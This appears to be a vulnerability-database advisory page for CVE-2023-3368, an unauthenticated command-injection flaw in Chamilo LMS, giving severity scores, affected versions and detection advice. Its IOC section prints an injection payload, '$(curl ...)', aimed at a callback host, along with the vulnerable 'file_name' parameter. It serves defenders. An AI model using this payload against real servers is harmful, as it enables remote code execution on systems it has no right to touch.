cbcvebase.
CVE-2023-3368
published 2023-11-28

CVE-2023-3368: Command injection in `/main/webservices/additional_webservices.php` in Chamilo LMS <= v1.11.20 allows unauthenticated attackers to obtain remote code execution…

PriorityP190critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
68.90%
99.3th percentile
Command injection in `/main/webservices/additional_webservices.php` in Chamilo LMS <= v1.11.20 allows unauthenticated attackers to obtain remote code execution via improper neutralisation of special characters. This is a bypass of CVE-2023-34960.

Affected

2 ranges
VendorProductVersion rangeFixed in
chamilochamilo< 1.11.201.11.20
chamilochamilo<= 1.11.20

Detection & IOCsextracted from sources · hover to see the quote

path/main/webservices/additional_webservices.php
command$(curl http://{{interactsh-url}}/)
otherwsConvertPptResponse
  • The vulnerable endpoint is unauthenticated — monitor for POST requests to /main/webservices/additional_webservices.php from unauthenticated sessions, especially those containing shell metacharacters (e.g., $(), backticks, semicolons) in the `file_name` parameter.
  • Exploitation uses the SOAP/web-service parameter `file_name` within a `wsConvertPpt` request (PPT-to-LP conversion service). Detect HTTP requests whose body contains `wsConvertPptResponse` in the response body as a confirmation of a successful hit against this endpoint.
  • The PoC payload injects a `$(curl ...)` command substitution into the `file_name` field alongside `service_ppt2lp_size` set to `720x540`. Alert on any `file_name` value containing `$(`, backtick command substitution, or other shell metacharacters in requests to this endpoint.
  • This CVE is an explicit bypass of CVE-2023-34960; if mitigations for CVE-2023-34960 are in place, they may be insufficient. Ensure detection rules cover both CVEs on the same endpoint.
  • ·The Nuclei template uses an out-of-band (interactsh) callback to confirm exploitation. In environments where outbound HTTP is blocked, the `$(curl ...)` payload will not produce a detectable callback; use alternative OOB channels or in-band detection (e.g., response timing, error messages) instead.
  • ·The vulnerability affects Chamilo LMS versions up to and including v1.11.20. Instances running versions beyond this threshold are not affected by this specific bypass.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.